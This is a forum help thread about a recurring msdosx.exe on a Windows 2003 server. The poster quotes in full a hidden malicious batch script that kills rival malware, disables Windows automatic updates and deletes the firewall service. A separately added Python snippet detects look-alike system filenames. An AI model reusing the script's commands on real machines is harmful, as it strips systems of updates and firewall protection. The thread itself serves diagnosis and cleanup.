• Status: Solved
  • Priority: Medium
  • Security: Public

msdosx.exe

Keep finding msdosx.exe on c:\ of a Win2k3 server. AV and spyware software do not find any problems.

Does anyone know what this is?
Asked: zombie99
 
fuzzymallets1Commented:
0
 
fuzzymallets1Commented:
0
 
zombie99Author Commented:
Same thing I have found. But if you delete it after rebooting it comes back.
0

 
fuzzymallets1Commented:
Then try using different Anti virus and spyware. What all have you used?
0
 
zombie99Author Commented:
I've got McAfee GroupShield (it happens to be an Exchange server) with the latest update & SUPERAntiSpyware... in the past these have worked for me.

I appreciate the help
0
 
fuzzymallets1Commented:
0
 
zombie99Author Commented:
Ok, after doing some research... I found under the \windows\temp folder a hidden file called bt3388.bat that creates a mess in the windows\system and system32 folders.

Also, apparently this "virus" is new since there was no information prior to 02/13/09.  

This is the script on the file:

cd %windir%\fix
attrib -s -h %windir%\system32\lssas.exe
attrib -s -h %windir%\system32\spooIsv.exe
attrib -s -h %windir%\system32\csrs.exe
attrib -s -h %windir%\system\smsc32.exe
attrib -s -h %windir%\system32\msddns.exe
attrib -s -h %windir%\system32\Isass.exe
attrib -s -h %windir%\system32\winIogon.exe
attrib -s -h %windir%\system32\regsvr.exe
attrib -s -h %windir%\usbservice.exe
attrib -s -h %windir%\FireFoxUpdater.exe
attrib -s -h %windir%\TSM7GN.exe
attrib -s -h %windir%\part2p.exe
attrib -s -h %windir%\system32\sysmgr.exe
attrib -s -h %windir%\system32\spoolsvc.exe
attrib -s -h %windir%\system32\no.exe.exe
attrib -s -h %windir%\system32\csrmgr.exe
attrib -s -h %windir%\system32\csrms.exe
attrib -s -h %windir%\system32\wgareg.exe
attrib -s -h %windir%\part1p.exe
attrib -s -h %windir%\sithhqp.exe
attrib -s -h C:\msisrv.exe
attrib -s -h %windir%\system32\msr.exe
attrib -s -h %windir%\security\svchost.exe
attrib -s -h %windir%\system\wuauclt.exe
attrib -s -h %windir%\system\msddll.exe
attrib -s -h %windir%\system\svhost.exe
attrib -s -h %windir%\system\vmwareservice.exe
attrib -s -h %windir%\lsass.exe
attrib -s -h %windir%\system32\service.exe
attrib -s -h C:\skp.exe
attrib -s -h %windir%\system32\wins\wmsncs.exe
attrib -s -h %windir%\system32\hgcheck.exe
attrib -s -h %windir%\system32\afisicx.exe
attrib -s -h %windir%\fonts\wmsncs.exe
attrib -s -h C:\recycler\tesktas.exe
attrib -s -h %windir%\system32\noytcyr.exe
attrib -s -h %windir%\system32\roytctm.exe
attrib -s -h %windir%\system32\soxpeca.exe
attrib -s -h %windir%\system32\tdydowkc.exe
attrib -s -h %windir%\system32\wsldoekd.exe
attrib -s -h %windir%\system32\udxfytw.sys
attrib -s -h %windir%\system32\msservice.exe
attrib -s -h %windir%\system32\csrsc.exe
attrib -s -h %windir%\system32\wscntfysvc.exe
attrib -s -h %windir%\system32\msnco.exe
move %windir%\system32\lssas.exe %windir%\temp\%random%
move %windir%\system32\spooIsv.exe %windir%\temp\%random%
move %windir%\system32\csrs.exe %windir%\temp\%random%
move %windir%\system32\Isass.exe %windir%\temp\%random%
move %windir%\system32\winIogon.exe %windir%\temp\%random%
pv -kf Isass.exe
pv -kf winIogon.exe
pv -kf lssas.exe
pv -kf spooIsv.exe
move %windir%\system32\lssas.exe %windir%\temp\%random%
move %windir%\system32\spooIsv.exe %windir%\temp\%random%
move %windir%\system32\csrs.exe %windir%\temp\%random%
move %windir%\system32\Isass.exe %windir%\temp\%random%
move %windir%\system32\winIogon.exe %windir%\temp\%random%
move %windir%\system32\msddns.exe %windir%\temp\%random%
move %windir%\system32\regsvr.exe %windir%\temp\%random%
move %windir%\smsc32.exe %windir%\temp\%random%
move %windir%\usbservice.exe %windir%\temp\%random%
move %windir%\FireFoxUpdater.exe %windir%\temp\%random%
move %windir%\TSM7GN.exe %windir%\temp\%random%
move %windir%\fonts\wmsncs.exe %windir%\temp\%random%
move %windir%\system\wuauclt.exe %windir%\temp\%random%
move %windir%\system32\csrsc.exe %windir%\temp\%random%
move %windir%\system32\wscntfysvc.exe %windir%\temp\%random%
move %windir%\system32\msnco.exe %windir%\temp\%random%
move %windir%\system32\msservice.exe %windir%\temp\%random%
move %windir%\system32\wgareg.exe %windir%\temp\%random%
move %windir%\system32\sysmgr.exe %windir%\temp\%random%
move %windir%\system32\spoolsvc.exe %windir%\temp\%random%
move %windir%\system32\no.exe.exe %windir%\temp\%random%
move %windir%\system32\udxfytw.sys %windir%\temp\%random%
move %windir%\system32\tpszxyd.sys %windir%\temp\%random%
move %windir%\system32\java.exe %windir%\temp\%random%
move %windir%\system32\sysmgr.exe %windir%\temp\%random%
move %windir%\system32\afisicx.exe %windir%\temp\%random%
move %windir%\system32\noytcyr.exe %windir%\temp\%random%
move %windir%\system32\wsldoekd.exe %windir%\temp\%random%
move %windir%\system32\roytctm.exe %windir%\temp\%random%
move %windir%\system32\tdydowkc.exe %windir%\temp\%random%
move %windir%\system32\mabidwe.exe %windir%\temp\%random%
move %windir%\system32\soxpeca.exe %windir%\temp\%random%
move %windir%\tsnp2std.exe %windir%\%random%
move %windir%\system32\msddns.exe %windir%\temp\%random%
pv -kf msddns.exe
move %windir%\system32\msddns.exe %windir%\temp\%random%
move %windir%\svchost.exe %windir%\%random%
move %windir%\fixcamera.exe %windir%\%random%
pv -kf tsnp2std.exe
pv -kf fixcamera.exe
move %windir%\tsnp2std.exe %windir%\%random%
move %windir%\svchost.exe %windir%\%random%
pv -kf FireFoxUpdater.exe
pv kf TSM7GN.exe
move %windir%\FireFoxUpdater.exe %windir%\temp\%random%
move %windir%\TSM7GN.exe %windir%\temp\%random%
move %windir%\fixcamera.exe %windir%\%random%
pv -kf wuauclt.exe
move %windir%\system\wuauclt.exe %windir%\temp\%random%
pv -kf wgareg.exe
pv -kf msservice.exe
move %windir%\usbservice.exe %windir%\temp\%random%
pv -kf usbservice.exe
move %windir%\usbservice.exe %windir%\temp\%random%
pv -kf *.sys
pv -kf csrmgr.exe
move %windir%\smsc32.exe %windir%\temp\%random%
pv -kf smsc32.exe
move %windir%\smsc32.exe %windir%\temp\%random%
pv -kf csrms.exe
pv -kf spoolsvc.exe
pv -kf sysmgr.exe
move %windir%\system32\regsvr.exe %windir%\temp\%random%
pv -kf regsvr.exe
move %windir%\system32\regsvr.exe %windir%\temp\%random%
pv -kf wscntfy.exe
pv -kf no.exe.exe
pv -kf sysmgr.exe
pv -kf afisicx.exe
pv -kf noytcyr.exe
pv -kf wsldoekd.exe
pv -kf roytctm.exe
pv -kf tdydowkc.exe
pv -kf mabidwe.exe
pv -kf soxpeca.exe
pv -kf rundll*
pv -kf ntv*
pv -kf dww*
pv -kf ping*
pv -kf task*
pv -kf csrsc.exe
pv -kf wscntfysvc.exe
pv -kf msnco.exe
move %windir%\fonts\wmsncs.exe %windir%\temp\%random%
pv -kf wmsncs.exe
move %windir%\fonts\wmsncs.exe %windir%\temp\%random%
cls
move %windir%\system32\csrsc.exe %windir%\temp\%random%
move %windir%\system32\wscntfysvc.exe %windir%\temp\%random%
move %windir%\system32\msnco.exe %windir%\temp\%random%
move %windir%\system32\msservice.exe %windir%\temp\%random%
move %windir%\system32\wgareg.exe %windir%\temp\%random%
move %windir%\system32\sysmgr.exe %windir%\temp\%random%
move %windir%\system32\spoolsvc.exe %windir%\temp\%random%
move %windir%\system32\no.exe.exe %windir%\temp\%random%
move %windir%\system32\udxfytw.sys %windir%\temp\%random%
move %windir%\system32\tpszxyd.sys %windir%\temp\%random%
move %windir%\system32\java.exe %windir%\temp\%random%
cls
move %windir%\system32\sysmgr.exe %windir%\temp\%random%
move %windir%\system32\afisicx.exe %windir%\temp\%random%
move %windir%\system32\noytcyr.exe %windir%\temp\%random%
move %windir%\system32\wsldoekd.exe %windir%\temp\%random%
move %windir%\system32\roytctm.exe %windir%\temp\%random%
move %windir%\system32\tdydowkc.exe %windir%\temp\%random%
move %windir%\system32\mabidwe.exe %windir%\temp\%random%
move %windir%\system32\soxpeca.exe %windir%\temp\%random%
move %windir%\system32\msservice.exe %windir%\temp\%random%
attrib -s -h %windir%\temp\csrssc.exe
attrib -s -h %windir%\winlogon.exe
pv -kf csrssc.exe
move %windir%\temp\csrssc.exe
move %windir%\winlogon.exe
cls
move %windir%\system32\udxfytw.sys %windir%\temp\%random%
move %windir%\part2p.exe %windir%\temp\%random%
move %windir%\part1p.exe %windir%\temp\%random%
move %windir%\sithhqp.exe %windir%\temp\%random%
move C:\msisrv.exe %windir%\temp\%random%
move %windir%\system32\msr.exe %windir%\temp\%random%
move %windir%\security\svchost.exe %windir%\temp\%random%
move %windir%\security\svchost.exe %windir%\temp\%random%
move %windir%\system\msddll.exe %windir%\temp\%random%
move %windir%\system\svhost.exe %windir%\temp\%random%
move %windir%\system\vmwareservice.exe %windir%\temp\%random%
move %windir%\part2p.exe %windir%\temp\%random%
move %windir%\part1p.exe %windir%\temp\%random%
move %windir%\sithhqp.exe %windir%\temp\%random%
move %windir%\lsass.exe %windir%\temp\%random%
move %windir%\system32\service.exe %windir%\temp\%random%
move C:\skp.exe %windir%\temp\%random%
cls
move %windir%\system32\wins\wmsncs.exe %windir%\temp\%random%
move %windir%\system32\hgcheck.exe %windir%\temp\%random%
move %windir%\system32\afisicx.exe %windir%\temp\%random%
move C:\recycler\tesktas.exe %windir%\temp\%random%
move %windir%\system32\noytcyr.exe %windir%\temp\%random%
move %windir%\system32\roytctm.exe %windir%\temp\%random%
move %windir%\system32\soxpeca.exe %windir%\temp\%random%
move %windir%\system32\tdydowkc.exe %windir%\temp\%random%
cls
move %windir%\system32\wsldoekd.exe %windir%\temp\%random%
move %windir%\system32\udxfytw.sys %windir%\temp\%random%
pv -kf udxfytw.sys
move %windir%\system32\udxfytw.sys %windir%\temp\%random%
move %windir%\system32\hgcheck.exe %windir%\temp\%random%
pv -kf hgcheck.exe
move %windir%\system32\hgcheck.exe %windir%\temp\%random%
move %windir%\system32\wins\wmsncs.exe %windir%\temp\%random%
pv -kf wmsncs.exe
move %windir%\system32\wins\wmsncs.exe %windir%\temp\%random%
move %windir%\system32\service.exe %windir%\temp\%random%
pv -kf service.exe
move %windir%\system32\service.exe %windir%\temp\%random%
move %windir%\system32\hgcheck.exe %windir%\temp\%random%
pv -kf hgcheck.exe
move %windir%\system32\hgcheck.exe %windir%\temp\%random%
cls
move C:\msisrv.exe %windir%\temp\%random%
pv -kf msisrv.exe
move C:\msisrv.exe %windir%\temp\%random%
move %windir%\system32\msr.exe %windir%\temp\%random%
scx config msrpxy start= disabled
scx delete msrpxy
pv -kf msr.exe
scx config msrpxy start= disabled
scx delete msrpxy
scx config AccessSharing start= disabled
scx config winspoolsvc start= disabled
scx config mscncosd start= disabled
cls
move %windir%\system32\msr.exe %windir%\temp\%random%
move %windir%\security\svchost.exe %windir%\temp\%random%
scx config WinHost32Svr start= disabled
move %windir%\security\svchost.exe %windir%\temp\%random%
move %windir%\system\msddll.exe %windir%\temp\%random%
scx config msddll start= disabled
pv -kf msddll.exe
cls
move %windir%\system\msddll.exe %windir%\temp\%random%
move %windir%\system\svhost.exe %windir%\temp\%random%
scx config "WindowsTelephony" start= disabled
pv -kf svhost.exe
cls
move %windir%\system\svhost.exe %windir%\temp\%random%
move %windir%\system\vmwareservice.exe %windir%\temp\%random%
scx config VmwareService start= disabled
pv -kf vmwareservice.exe
cls
move %windir%\system\vmwareservice.exe %windir%\temp\%random%
move %windir%\part2p.exe %windir%\temp\%random%
move %windir%\part1p.exe %windir%\temp\%random%
move %windir%\sithhqp.exe %windir%\temp\%random%
pv -kf part2p.exe
pv -kf part1p.exe
pv -kf sithhqp.exe
cls
move %windir%\part2p.exe %windir%\temp\%random%
move %windir%\part1p.exe %windir%\temp\%random%
move %windir%\sithhqp.exe %windir%\temp\%random%
scx config afisicx start= disabled
%windir%\system32\afisicx.exe
pv -kf afisicx.exe
scx stop afisicx.exe
scx config HCencerSer start= disabled
C:\recycler\tesktas.exe
pv -kf tesktas.exe
scx stop HcencerSer
scx config noytcyr start= disabled
%windir%\system32\noytcyr.exe
pv -kf noytcyr.exe
scx stop noytcyr
scx config roytctm start= disabled
%windir%\system32\roytctm.exe
pv -kf roytctm.exe
scx stop roytctm.exe
scx config soxpeca start= disabled
cls
%windir%\system32\soxpeca.exe
pv -kf soxpeca.exe
scx stop soxpeca.exe
scx config tdydowkc start= disabled
%windir%\system32\tdydowkc.exe
pv -kf tdydowkc.exe
scx stop tdydwokc
scx config wsldoekd start= disabled
%windir%\system32\wsldoekd.exe
pv -kf wsldoekd.exe
scx config "Usb Service 2.0" start= disabled
pv -kf usbservice.exe
scx config ypadky start= disabled
scx stop ypadky
scx stop wsldoekd
scx config Wxsynas start= disabled
scx stop Wxsynas
scx stop dnshost
scx config dnshost start= disabled
scx config winhost32svr start= disabled
scx config netstats start= disabled
scx stop ICF
cls
scx config "Windows automatic updates" start= disabled
pv -kf wuauclt.exe
move %windir%\system\wuauclt.exe %windir%\temp\%random%
scx delete ICF
move %windir%\system32\afisicx.exe %windir%\temp\%random%
move C:\recycler\tesktas.exe %windir%\temp\%random%
move %windir%\system32\noytcyr.exe %windir%\temp\%random%
move %windir%\system32\roytctm.exe %windir%\temp\%random%
move %windir%\system32\soxpeca.exe %windir%\temp\%random%
move %windir%\system32\tdydowkc.exe %windir%\temp\%random%
move %windir%\system32\wsldoekd.exe %windir%\temp\%random%
IF EXIST C:\recycler\s-1-5-21-1482476501-1644491937-682003330-1013\cfixer.exe (
pv -kf explor*
cd "c:\recycler\s-1-5-21-1482476501-1644491937-682003330-1013"
move cfixer.exe %windir%\%random%
)

del scx.exe
del pv.exe
cls
del C:\Helios.exe
del C:\msdos.exe
del C:\msdosx.exe
del C:\1.exe
del cln.bat

------------------------------------------------------------------

Any idea on how to reverse all this without re-installing?

Any help is appreciated.
0
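Added example, not part of the original thread or of the script quoted above: the paths in bt3388.bat include look-alike spellings of Windows system binaries (`Isass.exe` and `winIogon.exe` with a capital I, `lssas.exe`, `svhost.exe`) and genuine names in the wrong directory (`%windir%\lsass.exe`, `%windir%\security\svchost.exe`). This Python sketch classifies a file path on both counts; the known-binary table, the confusable-character map (which goes beyond the capital-I case seen in the script) and the 0.85 similarity threshold are assumptions chosen for illustration.

```python
import ntpath
from difflib import SequenceMatcher

# Assumed baseline: genuine binaries and their directory relative to %windir%.
KNOWN = {
    "lsass.exe": "system32", "csrss.exe": "system32",
    "winlogon.exe": "system32", "svchost.exe": "system32",
    "spoolsv.exe": "system32", "services.exe": "system32",
    "wuauclt.exe": "system32",
}
# Assumed look-alike substitutions: capital I or digit 1 for l, digit 0 for o.
CONFUSABLE = str.maketrans({"I": "l", "1": "l", "0": "o"})
THRESHOLD = 0.85  # assumed cut-off for "one or two characters off"

def classify(path, windir="%windir%"):
    """Return (verdict, genuine_name_or_None) for one Windows file path."""
    directory, name = ntpath.split(path)
    lowered = name.lower()
    rel = directory.lower().replace(windir.lower(), "").strip("\\")
    if lowered in KNOWN:
        # Right name: only legitimate when it sits in the expected directory.
        verdict = "ok" if rel == KNOWN[lowered] else "wrong-directory"
        return (verdict, lowered)
    skeleton = name.translate(CONFUSABLE).lower()
    if skeleton in KNOWN:
        # Identical to a genuine name once look-alike characters are folded.
        return ("homoglyph", skeleton)
    for legit in KNOWN:
        # Dropped, added or transposed letters (lssas, csrs, svhost, ...).
        if SequenceMatcher(None, skeleton, legit).ratio() >= THRESHOLD:
            return ("near-miss", legit)
    return ("unknown", None)

def scan(paths):
    """Return only the paths that imitate a known system binary."""
    findings = {}
    for p in paths:
        verdict, legit = classify(p)
        if verdict not in ("ok", "unknown"):
            findings[p] = (verdict, legit)
    return findings

# Sample input: paths copied from the script in the post above, plus one
# genuine location added for contrast.
SAMPLE = [
    r"%windir%\system32\Isass.exe", r"%windir%\system32\lssas.exe",
    r"%windir%\system\svhost.exe", r"%windir%\security\svchost.exe",
    r"%windir%\lsass.exe", r"%windir%\system32\noytcyr.exe",
    r"%windir%\system32\svchost.exe",
]
```

Names that return `unknown`, such as `noytcyr.exe`, imitate nothing and need a different signal, for example comparison against a file listing from a clean build of the same server.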
 
itsupportvaCommented:
Any ideas yet? I am having the same problem. My system32 folder is filling up with temp*.bk files.
0
 
zombie99Author Commented:
Ended up deleting everything manually. It works now.
0
 
zombie99Author Commented:
Did not get help for a few days. I ended up doing everything manually.
0
